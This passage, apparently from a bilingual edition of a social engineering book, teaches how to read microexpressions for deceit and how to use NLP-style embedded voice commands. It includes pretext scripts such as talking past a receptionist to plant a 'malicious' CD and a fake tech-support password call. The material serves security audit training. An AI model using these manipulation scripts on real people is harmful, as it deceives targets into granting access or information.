您知道,如果您留下 CD,您的“恶意”CD 就更有可能永远不会被使用。您还认为他在家,因为您在停车场看到他的车,并且您知道今天是他的正常工作日。考虑到这些事实,并且不想让前台人员感到尴尬,您会说:“哦,他真的不在吗?我前几天打电话询问我什么时候可以来,他们说今天是个好日子。我搞错了日子吗?”

You know that if you leave the CD a greater chance exists that your “malicious” CD will never be used. You also feel he is in because you see his car in the parking lot and you know today was a normal work day for him. With those facts in mind and without wanting to embarrass the front desk person you say, “Oh, he’s really not? I called the other day and asked when I could visit and was told today was a good day. Did I mix up my days?”

 

如果你打好牌并且表情真诚,结果可能有两种:

If you’ve played your cards right and your expressions are genuine, this can turn out two ways:

 
 
     
  • 她可能会保持镇定并再次说:“对不起,他不在。”
  • She may hold steady and again say, “Sorry, he’s not in.”
  •  
     
  • 她可能会自相矛盾(这可能表明她没有说实话):“让我看看他是否在家。”
  • She may contradict herself (which can be a clue that she is not being truthful): “Let me check whether he is in or not.”
  •  
 

什么?她从严肃的“他不在”变成了“让我看看”。这种矛盾足以表明你应该进一步挖掘。当她这样做时,她的自我是什么?她是否表现出对撒谎的羞愧或悲伤?她是否因为被发现撒谎而生气?她是否因为自己错了而感到尴尬,甚至感到困惑?你不能自动假设她在撒谎,因为也许她真的不知道,而当你反驳时,她决定真正找出答案。

What? She went from a stern “He is not in” to “Let me check.” That contradiction is enough to signal that you should dig more. What was her ME when she did that? Did she show shame or maybe some sadness at lying? Was she angry at being caught in a lie? Was she embarrassed that she was wrong and maybe confused? You cannot automatically assume she is lying, because maybe she really didn’t know, and when you rebutted she decided to really find out.

 

在她确认他是否在场后,你可以选择进一步挖掘并进一步探究,以确定她是否诚实。同样,打出“我可能搞错了日子”的牌并观察她的面部表情可以很好地表明她是否诚实。

After she confirms whether he is in you can choose to dig a little deeper and probe more to determine truthfulness if needed. Again, playing your card of “Maybe I mixed up my days” and watching her facial expressions can be a good indicator of her truthfulness or not.

 

如果在第一次询问时,你发现她有任何愤怒的迹象,继续询问可能会让她更加生气和尴尬,从而结束你们的互动。此时,你可能想问这样的问题:“如果史密斯先生现在不在,而且我真的搞错了日期或时间,我什么时候可以去见他?什么时间最好?”

If in your first go-round you saw any hints of anger, continuing to enquire can cause her to be more angry and embarrassed and end your interaction. At this point, you may want to ask something like, “If Mr. Smith isn’t in right now and I really mixed up my days or times, when can I stop in to see him? What time is the best?”

 

这种问题可以让她挽回面子,也让你有机会读懂她的面部表情。如果你没有注意到她的愤怒,但可能看到她看起来有点难过或尴尬,那么你可能想要用同理心和理解来回应她,让她敞开心扉。“我敢发誓他说今天是送手机的好时机,但你知道,我的记忆力很差,我妻子说我得了老年痴呆症。我买了一部这样的智能手机,但我很难弄明白。我不想打扰你,但我什么时候才能把手机交给他?我想确保它马上送到他手里。”

This type of question allows her to save face, as well as gives you another opportunity to read some facial expressions. If you didn’t notice anger but maybe saw she looked a little sad or embarrassed then you might want to respond with empathy and understanding to open her up. “I could have sworn that he said today was a good time to drop it off, but you know, my memory is so bad, my wife tells me I am getting Alzheimer’s. I bought one of these smart phones, but I’ll be darned if I can figure it out. I don’t want to be a bother, but when can I just drop this off for him? I want to make sure it gets right into his hands.”

 

要特别注意细微的矛盾,因为它们可能是欺骗的关键指标,并能帮助你获得机会。

Be very observant of minor contradictions as they can be key indicators in deceit and help you get your foot in the door.

 

犹豫

Hesitation

 

与矛盾类似,你可以利用某人的犹豫来发现潜在的谎言。如果你问了一个问题,而对方本应很快给出答案,但他却在回答之前犹豫了,这可能表明他在利用这段时间来编造答案。

Similarly to contradiction, you can use someone’s hesitation to detect a potential untruth. If you ask a question and the answer should have come quickly from the person, but he hesitates beforehand, it can be an indication that he was using the time to fabricate an answer.

 

例如,当我妻子问我新买的电子产品多少钱时,她知道我知道答案。犹豫可能意味着我正在评估是否要如实回答,或者我可能只是在记住价格。

For example, when my wife asks me how much my new electronic gadget costs, she knows I know the answer. A hesitation can mean either I am evaluating whether I want to answer truthfully or I might just be remembering the price.

 

当我从儿子的学校拿到进度报告,上面说他缺课 X 天,而我只知道大约两三天是真正缺课时,我会问他其余缺课天数是怎么来的。如果他的回答是“爸爸,你不记得我约了医生,然后你让我那天待在家里帮你做那个项目吗?”很有可能他是实话,因为他回答得很快,而且包含了事实。但是,如果他犹豫了一下,回答说“哇,我不知道——也许报告错了”,那么注意他回答时的微表情是个好主意。这是否表示愤怒(可能是因为被抓)或对想象中的惩罚感到悲伤?无论哪种情况,我都应该进行进一步调查,找出他那几天去了哪里。

When I get a progress report from my son’s school that says he missed X number of days at school and I only know about two or three valid absences, I ask him where the rest of these missed days are from. If his answer was, “Dad, don’t you remember I had that doctor appointment and then you kept me home that day to help you with that project?” Most likely that is full-on truth because it was quick and has facts in the response. However, if he hesitates and comes back with, “Wow, I don’t know—maybe the report is wrong,” then noting his microexpression during his response is a good idea. Does it indicate anger, maybe at being caught, or sadness at the imagined punishment? Either way, it is time for me to investigate more and find out where he was those days.

 

另一件需要注意的事情是,一个众所周知的犹豫策略就是重复问题,就好像在要求确认问题是否正确一样。这样做可以留出时间来编造答案。利用犹豫来检测谎言并不是一门精确的科学,但它可以是一个很好的指标。有些人说话前会思考。我来自纽约,所以我说话很快。如果有人说话比我慢,这并不表示他在说谎。你必须能够使用 ME 来确定某人是说话慢还是试图编造答案。

Another thing to look out for is a well-known hesitation tactic of repeating the question back to you as if asking for verification that the question is correct. Doing so allows for time to fabricate a response. The use of hesitation to detect deception is not an exact science, but it can be a good indicator. Some people just think before they speak. I am from New York, so I speak fast. If someone speaks slower than me it is not an indication of deceit. You must be able to use the ME to determine if someone is just slow at speaking or trying to fabricate a response.

 

如果情绪与提出的问题不符,那么可能值得研究。

If the emotion does not match the question asked then it might be worth looking into.

 

行为变化

Changes in Behavior

 

在讨论过程中,目标可能会在每次提到某个话题时改变自己的行为。也许你会注意到他表情的变化、坐姿的变化,或者明显的犹豫。所有这些行为都可能表明他在撒谎。这些行为是否构成撒谎尚不确定,但它们应该促使你以不引起怀疑的方式更多地探究正在讨论的话题。这些行为可能表明该人正在利用时间延迟来编造故事、回忆事实或决定是否要透露这些事实。

During a discussion the target may change his behavior every time a certain topic is brought up. Maybe you notice an expression change or a shift in the way he sits, or a marked hesitation. All of these actions can indicate deceit. Whether these actions amount to deceit is not certain, but they should cause you to probe more on the topics being discussed in a way that does not alert suspicion. These behaviors can be signs that the person is using the time delays to generate a story, recall facts, or decide whether he wants to reveal those facts.

 

手势

Hand Gestures

 

人们经常用手势来描绘画面。例如,有人可能会用手来表示某物有多大、某物移动的速度有多快,或者表示某事被说了多少次。许多专业人士认为,当一个人撒谎时,他会经常触摸或揉搓自己的脸。揉搓脸和编造谎言之间存在某种心理联系。以下讨论了心理学家和肢体语言专家用来检测谎言的一些线索:www.examiner.com/mental-health-in-new-orleans/detecting-deception-using-body-language-and-verbal-cues-to-detect-lies

People often paint pictures with their hands using gestures. For example, someone may use his hands to show how big something is, how fast something was going, or to show how many times something was said. Many professionals feel that when someone is being untruthful he will touch or rub his face often. Some psychological connection exists between rubbing the face and generating a fabrication. Some of the cues used by psychologists and body language experts to detect deceit are discussed here: www.examiner.com/mental-health-in-new-orleans/detecting-deception-using-body-language-and-verbal-cues-to-detect-lies.

 

在对话过程中,注意手势的大小、频率或持续时间的变化很重要。此外,你还应该观察手势过程中的面部表情,这可以提醒你注意。

Taking note of a change in the size, frequency, or duration of hand gestures during a conversation is important. In addition, you should watch facial expressions during gestures that can raise a flag in your mind.

 

当你发现谎言时,制定应对计划很重要,也是一个好主意。在前面的前台人员和她“不在办公室”的老板的场景中,揭穿她的谎言很可能会引起各种危险信号,让她难堪,并毁掉任何成功的机会。如果你的借口是某个有权威的人,比如经理或部门主管,而你发现某人在撒谎,那么你就可以利用这一点。通过“原谅”这个人,你现在应该得到回报。但在同样的场景中,如果你的职位比目标职位低(非管理职位,如秘书、接待员或销售员),打出这张牌可能会很危险。权威行动不适合非管理职位的人的借口。

When you detect deceit, having a plan for how to respond is important and a good idea. In the earlier scenario with the front desk person and her “out-of-the-office” boss, calling her out on her lie would most likely have raised all sorts of red flags, embarrassing her, and ruining any chances of success. If your pretext is someone with authority, like a manager or department supervisor, and you catch someone in a lie you can then use that to your advantage. By “forgiving” the person you are now owed a favor in return. But in the same scenario, if the position you are in is lower (someone in a non-management position such as a secretary, receptionist, or sales position) than the target, playing that card can be dangerous. The authority action would not fit the pretext of someone in a non-management position.

 

简而言之,作为一名社会工程审计员,你必须学会​​利用一个人的微表情来判断他说的是真话还是谎话,并判断你是否以你想要的方式影响了目标。在某些情况下,你甚至可以使用某些表情来操纵目标进入某种心理状态。

What it boils down to simply is that as a social engineer auditor you must learn to use a person’s microexpressions to determine whether he is presenting the truth or a lie and to determine whether you are affecting the target the way you want. In some cases you can even use certain expressions to manipulate the target into a certain state of mind.

 

请记住,微表情本身不足以确定情绪产生的原因。例如,确定某人生气或悲伤并不能告诉你这个人为什么生气或悲伤。使用微表情时要谨慎,要考虑所有因素,尽可能准确地确定情绪产生的原因。

Remember, microexpressions alone are not enough to determine why an emotion is occurring. Determining that someone is angry or sad, for instance, doesn’t tell you why that person is angry or sad. Be cautious when using microexpressions to take into consideration all factors to determine, as closely as possible, the reason for the emotion.

 

恶意社会工程师会采用本节讨论的微表情策略,但他们的目标与进行审计的社会工程师完全不同。他们通常不关心对目标的残留影响。如果破坏一个人的信仰体系、心理稳定性甚至工作稳定性可以让恶意社会工程师获得回报,他就会选择这条路。

Malicious social engineers employ these tactics of using microexpressions discussed in this section but their goals are completely different from those of a social engineer doing an audit. They often don’t care about the residual effect on the target. If damaging a person’s belief system, psychological stability, or even job stability can lead the malicious social engineer to a payday he will take that path.

 

在本书前面部分,您读到过 9/11 之后纽约市袭击事件中出现的一些骗局。那些利用人们的同情和悲剧牟利的人似乎并不关心他们的行为是否伤害了他人。许多人从阴影中走出来,声称自己的家人在袭击中丧生。其中一些恶意的人得到了金钱、礼物、同情,甚至媒体的关注,但后来才发现这些故事都是假的。

Earlier in this book you read about some scams that came up during the attacks in New York City after 9/11. People who saw an opportunity to cash in on people’s sympathy and the tragedy that occurred didn’t seem to care whether their actions hurt others. Many came out of the shadows claiming to have family who were lost in those attacks. Some of these malicious people received money, gifts, sympathy, and even media attention only for it to be discovered down the road that the stories were all false accounts.

 

恶意社交工程师花费大量时间了解人们以及他们的动机。这些知识使他们更容易找到可接受的攻击目标。

The malicious social engineer spends a lot of time learning about people and what makes them tick. This knowledge makes locating an acceptable target to attack easier.

 

本节只是触及了微表情的表面;该领域许多专业人士的工作已经写满了书。寻求培训,熟练阅读和使用微表情,你会看到与他人沟通的能力有所提高。此外,这种熟练程度将提高你成功完成审计的能力。

This section just scratched the surface of microexpressions; the work of many professionals in the field has filled volumes. Seek out training, become proficient in reading and using microexpressions, and you will see an increase in your communication abilities with others. In addition, this proficiency will enhance your ability to have success in your audits.

 

神经语言程序设计 (NLP)

Neurolinguistic Programming (NLP)

 

神经语言程序设计 (NLP) 研究人类思考和体验世界的结构。它本身就极具争议性,因为 NLP 的结构不适合用精确的统计公式来表达。许多科学家会因此争论或辩论 NLP 的原理,但该结构确实可以建立原理如何运作的模型。从这些模型中,人们已经开发出快速有效地改变限制人们的思想、行为和信念的技术。

Neurolinguistic programming (NLP) studies the structure of how humans think and experience the world. It is very controversial in itself because the structure of NLP does not lend itself to precise, statistical formulas. Many scientists will argue or debate the principles of NLP due to this fact, but the structure does lead to models of how the principles work. From these models, techniques for quickly and effectively changing thoughts, behaviors, and beliefs that limit people have been developed.

 

根据维基百科(来源:牛津英语词典)的解释,神经语言程序设计是“一种人际沟通模型,主要关注成功的行为模式与其背后的主观经验(尤其是思维模式)之间的关系”,以及“一种以此为基础的替代疗法体系,旨在教育人们提高自我意识和有效沟通能力,并改变人们的心理和情感行为模式”。

As stated in Wikipedia (source: Oxford English Dictionary), neurolinguistic programming is “a model of interpersonal communication chiefly concerned with the relationship between successful patterns of behavior and the subjective experiences (esp. patterns of thought) underlying them,” and “a system of alternative therapy based on this which seeks to educate people in self-awareness and effective communication, and to change their patterns of mental and emotional behavior.”

 

这本书远非一本自助书籍,因此,虽然其中的原则可以帮助改变你根深蒂固的思维模式和习惯,但它的重点是如何使用 NLP 来理解并操纵你周围的人。

This book is far from a self-help book, so although the principles in it can assist in changing deep-seated thought patterns and habits in yourself, its focus is on how you can use NLP to understand and then manipulate those around you.

 

如果您不熟悉 NLP,您的第一反应可能是跑到电脑前,在 Google 中输入该术语。我想请您暂时不要这样做。您会发现,与社会工程学类似,您首先会发现许多看起来非常不切实际的视频和演示,例如某人触摸另一个人的肩膀并改变该人的大脑模式,使其认为棕色是白色或诸如此类的视频。这些视频将 NLP 描绘成某种神秘主义,而对于那些对此持怀疑态度的人来说,这些类型的视频会使其失去可信度。

If you are unfamiliar with NLP your first instinct may be to run to a computer and type the term into Google. I want to ask you not to do that just yet. You will find that similar to social engineering, what you will often find first are many videos and demonstrations that just seem very unrealistic, such as videos of someone touching another person’s shoulder and changing that person’s brain patterns to think brown is white or somesuch. These videos make out NLP to be some form of mysticism, and for those who are leery of these things, these types of videos discredit it.

 

相反,以下部分将 NLP 分为几个部分。接下来是 NLP 的简要历史,这可以帮助您了解它的根源不在于街头魔术师;相反,它具有深厚的心理根源。

Instead the following sections break NLP down into a few parts. Up next is a very brief history of NLP, which can help you to understand that its roots are not with street magicians; instead, it has deep psychological roots.

 

神经语言编程的历史

The History of Neurolinguistic Programming

 

神经语言程序设计 (NLP) 是理查德·班德勒和约翰·格林德在格雷戈里·贝特森的指导下于 20 世纪 70 年代开发出来的。它的根源来自班德勒和格林德对当时一些最成功的治疗师的研究。

Neurolinguistic programming (NLP) was developed in the 1970s by Richard Bandler and John Grinder with the guidance of Gregory Bateson. Its roots came from Bandler and Grinder’s research into some of the most successful therapists of their time.

 

他们从这项初步研究中开发出了 NLP 的“代码”概念。这项早期研究促成了元模型的开发,该模型认识到使用语言模式来影响变革。

From this initial research they developed the “code” concepts of NLP. This early research led to the development of a meta-model, which recognizes the use of language patterns to influence change.

 

班德勒和格林德都是加州大学的学生,他们利用研究成果开发了一种名为元模型的治疗模型。在基于该模型撰写了几本书之后,他们开始完善核心原则,这些原则后来成为我们今天所说的 NLP。其中包括锚定、摇摆模式、重构、信念改变、嵌套循环、链接状态和次模态应用等。

Both Bandler and Grinder were students at the University of California and used the principles of their research to develop a therapy model called the meta-model. After writing a few books based on this model they began to refine the core principles that would become what we call NLP today. This included things like anchoring, swish pattern, reframing, belief change, nesting loops, chaining states, and submodalities applications.

 

获得心理学学位后,班德勒和格林德开始举办研讨会和实践小组,这些研讨会和小组是他们练习和测试新发现模式的地方,同时也让他们将技能传授给参与者。在此期间,一群以格林德和班德勒为中心、富有创造力的学生和心理治疗师为 NLP 做出了宝贵贡献,帮助 NLP 进一步完善。

After graduating with degrees in psychology, Bandler and Grinder began hosting seminars and practice groups, which served as places for them to practice and test their newly discovered patterns while allowing them to transfer the skills to the participants. During this period, a creative group of students and psychotherapists who formed around Grinder and Bandler made valuable contributions to NLP, helping refine NLP even more.

 

近年来,NLP 再次成为管理者的新热词,推动了培训师、课程和专家的快速增长。没有任何监管机构,该领域不断发展,因为每个人都想学习如何控制他人、撒谎而不被发现,或者解决他们所有的心理问题。从业者没有执照,所以每个团体都教授自己的 NLP 形式和概念,并颁发自己的专家证书。所有这些都导致 NLP 在某种程度上遭到不利的对待。

In the recent years, NLP became the new buzzword again for managers, driving rapid growth of trainers, classes, and experts. Without any regulating body, the field grew as everybody wanted to learn to control others, lie without getting caught, or solve all their psychological problems. Practitioners were not licensed, so each group taught its own form and concept of NLP and issued its own certification as experts. All of this is what led to NLP being viewed somewhat unfavorably.

 

尽管历史坎坷,但 NLP 的核心基础可以增强你作为社会工程师的能力。下一节将讨论 NLP 的一些核心代码,以便你更深入地分析它们。

Despite its rocky history, the core foundation of NLP can enhance your abilities as a social engineer. The next section discusses some of the core codes of NLP so you can analyze them more deeply.

 

神经语言编程代码

Codes of Neurolinguistic Programming

 

20 世纪 70 年代初,NLP 拥有一套由集体学习和研究组成的准则,由此产生了第一批书籍和术语“神经语言程序设计”。随着时间的推移,John Grinder 和其他人继续为 NLP 领域做出贡献。“NLP 新准则”是 NLP 开发的道德和美学框架。

In the early 1970s NLP had a code comprised of the collective body of learning and investigation that generated the first books and the term neurolinguistic programming. As time went on John Grinder and others have continued to contribute to the field of NLP. The “new code of NLP” is an ethical and aesthetic framework for NLP development.

 

NLP 新代码

New Code of NLP

 

NLP 的最初想法诞生于 20 世纪 70 年代。随着时间的推移,John Grinder 开始意识到,许多旧代码必须改变才能适应现代。他开始与 Gregory Bateson 和 Judith DeLozier 合作,并制定了“新代码”,该代码更关注人们的想法或信念,并改变这种信念。学习扩展感知、克服旧思维模式和改变习惯的技巧都有助于自我改变。

NLP’s original ideas were born in the 1970s. As time passed, John Grinder began to realize that much of the old code must change to be brought into modern times. He began working with Gregory Bateson and Judith DeLozier and produced the “new code” that focused more on what the person thinks or believes will happen and changing that belief. Learning techniques for expanding your perceptions, overcoming old thought patterns, and changing habits all help in self-change.

 

新规范重点关注状态意识/潜意识关系感知过滤器等关键概念,所有这些都指向您的心理状态以及您对这些心理状态的感知。这些新概念旨在推动 NLP 的发展,并帮助从业者以新的方式思考它。新规范中的许多基本原则现在作为标准 NLP 课件的一部分进行讲授。通过阅读Grinder 和 DeLozier 的《Turtles All the Way Down》,可以最好地理解这一新规范。它是根据他们的研讨会“个人天才的先决条件”编写的。

The new code focuses on the key concepts of states, conscious/unconscious relationships, and perceptual filters, all of these pointing to states of your mind and your perception of those mental states. These new concepts are meant to move NLP forward and help practitioners think about it in new ways. Many of the basic tenets from the new code are being taught now as part of the standard NLP courseware. This new code is best understood by reading Turtles All the Way Down by Grinder and DeLozier. It’s compiled from their seminar “Prerequisites to Personal Genius.”

 

从本质上讲,新准则规定,要做出改变,客户必须调动他们的潜意识,新行为必须满足他们最初的积极意图,而且改变必须发生在内心,而不是行为层面。这个新准则表明了 NLP 如何能够对一个人的思维产生重大而剧烈的变化。

In essence, the new code states that to make a change the client must involve their unconscious mind, the new behavior must satisfy their original positive intention, and the change must occur internally at the state of mind rather than at the behavioral level. This new code suggests how NLP can create serious and drastic changes to a person’s thinking.

 

这是社会工程师的一个关键概念,因为当你调查和分析新代码时,你将开始看到它如何被用来操纵他人。不过,在此之前,你需要了解新代码使用的脚本。

This is a key concept for social engineers because, as you investigate and analyze the new code, you will begin to see how it can be used to manipulate others. Before doing that, though, you need to understand the scripts that the new code uses.

 

新法典中的脚本

Scripts in the New Code

 

人们往往有共同的问题,因此开发了一系列脚本来帮助治疗师在实践中使用 NLP。这些脚本引导参与者通过一系列想法,帮助人们达到预期的结果。目前有几本关于 NLP 脚本的好书,其中《NLP 技术大全:200 多种神经语言编程模式和策略》是强烈推荐的。

People tend to have common problems, so groups of scripts have been developed to help therapists use NLP in their practice. These scripts lead the participant through a series of thoughts that help guide the person to the desired end. Several good books on NLP scripts exist, with The Big Book of NLP Techniques: 200+ Patterns & Strategies of Neuro Linguistic Programming being highly recommended.

 

一个脚本的示例是概述如何通过让某人开始谈论他们的梦想来增加您的销售量。一旦您让他们谈论某些目标或愿望,您就可以假设您的产品或服务可以满足实现这些目标的需求之一。通过积极地将您的产品打造为满足他们的需求,您可以让潜在销售人员的大脑将您的产品与积极的销售联系起来。

An example of one script is an outline of how to increase your sales by getting someone to start talking about their dreams. Once you have them talking about certain goals or aspirations, you can posit your product or service as answering one of the needs to reach those goals. By positively building on your product as fitting a need they have, you give your potential sale’s brain a way to connect your product with positive sales.

 

如果您花时间在 Google 上搜索此处包含的大部分信息,您会发现 NLP 可以自成一派。研究 NLP 时,您可以从多个角度和途径进行。尽管有大量信息,但问题仍然存在,社会工程师如何使用 NLP?

If you take time to Google much of the information included here you will see that NLP can take on a life of its own. You can take many angles and paths when studying NLP. Despite all the plethora of information out there the question remains, how can a social engineer use NLP?

 

如何使用 NLP 作为社会工程师

How to Use NLP as a Social Engineer

 

NLP 的许多脚本和原则倾向于催眠和类似途径。即使您不会使用催眠来对目标进行社交工程,您也可以将 NLP 的许多原则用作社交工程。例如,NLP 可以教您如何使用您的声音、语言和措辞选择来引导人们走上您想要的道路。

Many of the scripts and principles of NLP tend to lean toward hypnosis and similar avenues. Even though you will not use hypnosis to social engineer a target, you can use many of the principles of NLP as a social engineer. For example, NLP can teach you how to use your voice, language, and choice of words to guide people down the path you want.

 

NLP 中的语音

Voice in NLP

 

您可以使用语音向人们注入命令,就像使用代码向 SQL 数据库注入命令一样。您说话的方式就是注入发生的地方;注入的这一瞬间是在正常对话中进行的。有时,您说话的方式比您说的更重要。

You can use your voice to inject commands into people just as you would use code to inject commands into a SQL database. The way you say things is where the injection occurs; this single moment of injection is framed within regular conversation. Sometimes how you say something is more important than what you say.

 

NLP 提倡使用嵌入式命令来影响目标以某种方式思考或采取某种行动。此外,使用语调来强调句子中的某些单词可以使人的潜意识专注于这些单词。例如:

NLP promotes the use of embedded commands to influence a target to think a certain way or take a certain action. Also, using the tones of your voice to emphasize certain words in a sentence can cause a person’s unconscious mind to focus on those words. For example:

 

例如,问“你不同意吗?”不要像通常在问题末尾那样在“同意”一词上加升号,而要加降号,以使问题更像命令。

For instance, ask “Don’t you agree?” Instead of putting an upswing on the word “agree,” like you would normally at the end of a question, put a downswing to make the question more of a command.

 

我听到过的另一个有效用法是,“我的顾客通常按照我说的做。你想开始吗?”这句话的使用方式以及与其他陈述的结合可以使这句话成为一个非常有说服力的陈述。

Another one I have heard used effectively is, “My customers usually do the things I say. Do you want to begin?” The way that sentence is used and surrounded by other statements can make this a very commanding statement.

 

下一节将对此进行更详细的介绍,但仅此一项技能就可以改变您与他人互动的方式;它的原理深深植根于 NLP。

More on this in the next section, but this skill alone can change the way you interact with others; the principles for it are steeped in NLP.

 

句子的结构

Sentence Structure

 

在英语中,句子结尾处人的声音表明所说的内容是问题、陈述还是命令。问题时,人的声音在句子结尾处升高。陈述时,声音在句子结尾处保持不变,命令时,声音在句子结尾处降低。

In English, the sound of the person’s voice at the end of sentence indicates whether what is being said is a question, statement, or command. A person’s voice goes up at the end of a sentence for questions. The voice stays the same through the end of the sentence in statements, and the voice lowers at the sentence close for commands.

 

对于接下来的几段,粗体字体表示降低(加深)您的语调。

 

For the next few paragraphs, the bold font denotes to lower (deepen) your voice tone.

 
 

试试这个练习:当你问“那是你的狗吗?”这样的问题时, 你的语调会在句子结尾处升高。但是,你可以将微妙的命令嵌入句子中,只需在句子中将它们改为向下的点,而不是在句子结尾。这里有一些简单的命令供你练习。注意它们是如何将命令插入句子中的。

Try this exercise: When you ask a question such as, “Is that your dog?” your voice will rise at the end of that sentence. Yet you can embed subtle commands into sentences by just changing them to a downward point during the sentence, not at the end. Here are a few simple commands for you to practice. Notice how they have the command injected inside the sentence.

 

“还记得去年圣诞节你的房间有多干净吗?”嵌入的命令是“打扫你的房间”,其中包括时间转移到更快乐的时光。这是一个愉快、无痛注射的例子。

 

立即购买,您就能看到好处!”这句话一开始声音很低,然后提高到正常音调,最后又降低为好处

 

我的公司在咨询行业中的排名越高,我们遇到的像您这样的好人就越多。”用令人愉快的评论来表达“我的公司排名越高”只会增加您被录用的机会,部分原因是文字游戏(Higher听起来像hire —因此听者听到的是hire my company)。

 

“Remember how clean your room looked last Christmas?” The embedded command is “clean your room,” which includes a time shift to a happier time. This is an example of a pleasant, painless injection.

 

Buy now, you can see the benefits!” This one starts with the voice low, then up to a normal tone, then back down for benefits.

 

“The higher my company goes in consulting, the more nice people like you we encounter.” Implanting the higher my company with a pleasant comment has just increased your chance of being hired, partly because of the play on words (Higher sounds like hire—thus what the listener hears is hire my company).

 
 

从社会工程学的角度来看,你可以在电话中进行审计时形成一些句子,以最大限度地提高成功的可能性,例如:

From a social engineering standpoint you can form sentences when performing an audit over the phone to maximize the potential for success, such as:

 

“我是技术支持的 Larry;我们正在为所有代表提供新密码。您的密码是……”

“This is Larry from tech support; we are giving all reps new passwords. Your new password is…”

 

以下是在成功的社会工程中运用你的声音的技巧:

The following are tips for using your voice in successful social engineering:

 
 
     
  • 练习。你必须练习用这种方式说话,这样你听起来才不会像一个刚进入青春期的十几岁男孩。你的升降调不能听起来很刻板;它们必须很微妙。
  • Practice. You have to practice speaking in this manner so you don’t sound like a teenage boy entering puberty. Your rising and falling tones can’t sound canned; they must be subtle.
  •  
     
  • 谨慎构造句子。设计能够最大程度地提高您完成任务能力的句子。不要一味追求杀戮。像“现在让我访问您的服务器机房”这样的命令可能不起作用,但您可以使用这些语音技巧来帮助目标更愿意接受这个想法。
  • Have careful sentence structure. Develop sentences that maximize your ability to accomplish your tasks. Don’t go for the kill, so to speak. A command like “give me access to your server room now” is probably not going to work, but you can use these voice techniques to help a target be more open to the idea.
  •  
     
  • 要现实一点。不要指望说一句话就能让人们拜倒在你的脚下并按照你的要求去做。这些技巧可以让你的目标处于一种心态,让你更容易得到你想要的东西。
  • Be realistic. Don’t expect to speak and have people falling at your feet to do what you ask. These techniques can put your target in a frame of mind that will make getting what you want easier.
  •  
 

有一种技巧,即终极声音,如果掌握了,确实会产生非常强大的效果。我曾经在播客上采访过一位拥有这种天赋的 NLP 从业者。当他说话时,你似乎无法与他争论。他说话时如此有控制力和技巧,以至于我从未想过要反对他。如何才能掌握这种技巧?

One technique, Ultimate Voice, if mastered, does have very powerful effects. I once interviewed an NLP practitioner on a podcast who had this gift. When he spoke it was as if you could not argue with him. He spoke with such control and technique that disagreement never even entered my mind. How can one master this technique?

 

在社会工程学中使用 Ultimate Voice

Using Ultimate Voice in Social Engineering

 

你可以掌握终极语音,但需要大量练习。将命令嵌入正常对话的能力是一项非常有用的技能。终极语音是在人们不知情的情况下将命令注入他们头脑的能力。新手尝试时,它听起来可能非常不自然,直到足够的练习使它们听起来自然。

You can master the Ultimate Voice but it takes lots of practice. The ability to embed commands into normal conversation is a skill that is very useful when mastered. Ultimate voice is the ability to inject commands into people’s minds without their knowledge. It can sound very artificial when new people try it, until enough practice makes them sound natural.

 

催眠师经常这样使用这种技术:

Hypnotists often use this technique like so:

 

“当你陷入平静时,你会感觉自己放松了。”

 

“You can feel yourself relaxing as you slip into calmness.”

 
 

这个标准治疗短语可以适应几乎任何你喜欢的命令。在你想要强调的单词中,要特别强调元音——例如,“yooouurseeelf reelaaxiing”。

This standard therapy phrase can be adapted to nearly any command you like. Put extra emphasis on the vowels in the words you want to accent—for example, “yooouurseeelf reelaaxiing.”

 

Planet NLP(www.planetnlp.com/)提供了三种练习,您可以使用它们来掌握这项技巧。

Planet NLP (www.planetnlp.com/) offers three exercises that you can use to work on mastering this technique.

 

1. 移动你的声音。用手按住鼻子,说“nose”。重复这个词时,集中注意力在鼻子上,直到你能感觉到鼻子在振动。现在,用手按住喉咙,说“throat”。用手按住胸部,说“chest”。继续练习,直到你能真正感觉到每个部位的振动。注意每个部位的发音有多么不同。

2. 充分利用你的音域。从高音开始,发“ar”(如字母r中的发音)。保持嘴巴张开,让音调下降,直到你呼气结束。

重复此练习十次。

 

然后,从低音开始说“ou”(就像没有y 的you一样),让音符上升直到你无法支持这个声音。

 

重复此练习十次。

 

3. 产生共鸣。要正确使用你的声音,它必须在面罩内产生共鸣,面罩是鼻子和嘴巴周围的面部区域。

1. Move your voice around. Press your hand on your nose and say “nose.” Concentrate on your nose as you repeat the word until you can feel your nose vibrating. Now do the same exercise with your hand on your throat, saying “throat.” Do the same on your chest, saying “chest.” Keep practicing until you can really feel the vibration in each place. Notice how different each one sounds.

2. Use your range. Starting from a high note, say “ar” (as in the letter r). Keeping your mouth open, allow the note to drop down until your breath runs out.

Repeat this exercise ten times.

 

Then, starting from a low note, say “ou” (as in you without the y), allowing the note to rise until you cannot support the sound.

 

Repeat this exercise ten times.

 

3. Resonate. To use your voice correctly, it must resonate in the mask, which is the facial area surrounding the nose and mouth.

 

练习共鸣有两种方法:
 
     
  • 用你觉得最舒服的音调哼唱。找到适合自己的音调后,哼唱“嗯”,然后立即哼唱“准备好了”这个词。重复几次,然后尝试哼唱“现在”、“一”、“二”和“三”。
  •  
  • 哼唱,然后让嘴唇振动。你试图发出鸽子般的声音。让音调起伏。如果你的下巴或脸部有任何紧张感,这会非常困难。正确练习几分钟后,你的脸就会开始感到麻木。
 

There are two ways to practice resonating:
 
     
  • Hum at whatever pitch is most comfortable for you. After you have found your pitch then hum “umm” followed immediately by the word “ready.” Do this a few times, then try the words “now,” “one,” “two,” and “three.”
  •  
  • Hum and then allow your lips to vibrate. You are attempting to sound like a dove. Allow the pitch to rise and fall. This is very difficult if you have any tension in the jaw or face. Done correctly for a few minutes, your face will start to feel numb.
 

 

使用这些方法几分钟后,你应该会注意到你的声音听起来更清晰了。如果你觉得很难注意到,可以录下自己的声音,然后听听看你听起来怎么样。

After a couple of minutes using these methods, you should notice that your voice sounds crisper. If you find it hard to notice, record yourself and listen back to see how it sounds to you.

 

提高的最好方法是每天花大约五分钟做这些练习。

The best way to improve is to spend about five minutes a day going through these exercises.

 

练习可以帮助你学会控制这种发声技巧。例如,我通常是一个大声说话的人。似乎我没有低声说话的能力。为了控制我的音调、音高和音量,我需要练习。做这些简单的声音练习可以帮助你控制这些声音特征。

Practice can help you to learn to control this vocal technique. For example, I am generally a loud person. It seems like I don’t have the ability to whisper. For me to control my tones, pitch, and volume, I need practice. Doing simple voice exercises like these can help you to control these voice characteristics.

 

当你说出一个句子,想要在其中包含一个隐藏的命令,并且想要降低你的语调时,要非常微妙,以至于目标没有意识到这是命令式的。否则,你会提醒那个人的潜意识,触发一些不对劲的事情。如果发生这种情况,他可能会发现你的企图,从而阻止你成功。

